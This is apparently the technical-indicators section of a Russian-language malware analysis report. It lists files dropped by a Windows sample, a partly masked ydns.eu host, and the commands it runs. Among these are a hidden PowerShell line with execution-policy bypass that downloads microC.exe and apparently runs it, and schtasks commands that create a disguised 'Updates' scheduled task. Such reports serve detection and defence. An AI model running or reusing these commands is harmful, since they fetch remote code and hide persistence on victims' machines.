Техническая информация
- <SYSTEM32>\tasks\updates\aqybwlpahqfm
- http://le#######kokkiskikinew.ydns.eu/microc.exe как %appdata%\microc.exe
- microc.exe
- %TEMP%\abdtfhghgdghghВќ.sct
- %APPDATA%\microc.exe
- %APPDATA%\aqybwlpahqfm.exe
- %TEMP%\tmpfc19.tmp
- %APPDATA%\aqybwlpahqfm.exe
- %TEMP%\abdtfhghgdghghВќ.sct
- %TEMP%\tmpfc19.tmp
- 'le#######kokkiskikinew.ydns.eu':80
- http://le#######kokkiskikinew.ydns.eu/microC.exe
- DNS ASK le#######kokkiskikinew.ydns.eu
- '%APPDATA%\microc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://le#######kokkiskikinew.ydns.eu/microC.exe','%APPDATA%\microC.exe');Sta...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\AqybWLPaHQfm" /XML "%TEMP%\tmpFC19.tmp"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\AqybWLPaHQfm" /XML "%TEMP%\tmpFC19.tmp"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\dw20.exe' -x -s 388